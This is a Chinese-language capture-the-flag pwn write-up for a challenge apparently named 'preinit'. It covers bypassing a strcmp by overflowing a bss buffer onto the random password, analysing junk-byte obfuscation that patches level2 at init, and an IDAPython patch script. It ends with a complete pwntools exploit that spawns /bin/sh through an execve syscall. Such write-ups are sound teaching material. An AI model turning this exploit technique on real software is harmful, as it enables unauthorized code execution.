查看保护：

查看ida：

这边其实看反汇编没啥大作用，需要自己动调。

但是前面的绕过strcmp还是要看一下的。

解题：

这里是用linux自带的产生随机数的文件urandom来产生一个随机密码，然后让我们输入密码，用strcmp检查password是否与checkpass一样。我们可输入的字节数为0x110。

这里可以看出来我们的输入其实是存到bss段里了，而password距离checkpass也就0x100，所以我们的输入是可以覆盖checkpass的。

但是全题就这一个输入的地方，所以要考虑很多才能写好payload。

输入完之后进入level

这里会把我们的输入存入s中，在check中进行异或操作，再进入level2。

ida没什么好讲的，动调才是重点。

首先，你在level2打断点进如level2了之后就会发现这里跟ida汇编里是不一样的。

ida里面是这样的

完全不一样

这里是因为程序对level2进行了修改，所以我们即使在静态调试看机器码也看不出来，只有动调才能知道level2被修改了。

问题就出在初始化那里

他这里自己自定义了一个初始化数组

对level2是又一定影响的，而且这里还用了花指令，从地址红色可以看出这些地方解析有争议。

事实上，其实我们用不着去了解为啥level2被改，也用不着在ida里把level2给改回来（在ida里修改机器码是影响不了elf文件的，只是为了分析），直接看动调就行了，动调是啥就是啥。

但既然有这个点就说一下。

我们先看动调出来的

对机器码敏感的应该很快就可以看出来，\x57对应push di，而\x56对应push si，后面的也可以对应得上（这里是人为注入机器码形成花指令，有些数据是干扰的），那就是题目引导你去把这里的机器码改进level2中。

然后排除干扰数据修改level2

import idaapi
list=[0x480A7F8D48525657,0x0AAF300000050C1C7,0x0FF085F8D485F5E5A,0x0C3E3]
addr=0x401324
for i in list:idaapi.put_qword(addr,i)addr+=8

说了那么多，感觉都不如直接看动调来得容易，毕竟比赛的时候太难想到了。

在执行jmp rbx之前，无论输入啥，在大多数情况下rdi里面会储存我们输入的字符串的开头，rsi为0，rdx为0，rax为输出的字节数，rip为rdi+8并可以控制，如果此时我们令rdi为/bin/sh，rip为syscall就可以进行系统调用execve。这样就出了。

完整exp：

from pwn import*
context(log_level='debug')
p=process('./preinit')list=b'/bin/sh\x00\x0f\x05' #\x0f\x05是调用syscall
shell=[]
shell+=[i^0x3b for i in list]
'''
for i in list:shell.append(i^0x3b)
'''
shell=bytes(shell)+b'%50c'
payload=shell
payload=payload.ljust(0x100,b'\x00')
payload+=shell
print(payload)
p.sendafter(b'what is your password:',payload)
p.interactive()

补充点1：

在我们调试的时候可能会认为程序卡住了，比如下图

其实这是因为rep stosb的原因，准确的说是rep，他会根据cx寄存器里的值进行重复操作，比如这里是rcx=0x50，他就会进行0x50次操作，重复完之后会接着进行下一步。

补充点2：

像刚刚的操作在ida没法修改elf文件的机器码

补充点3：

在修改level2的时候可能会遇到这种情况

那就鼠标选中要重新分析的范围

按c重新分析

就可以了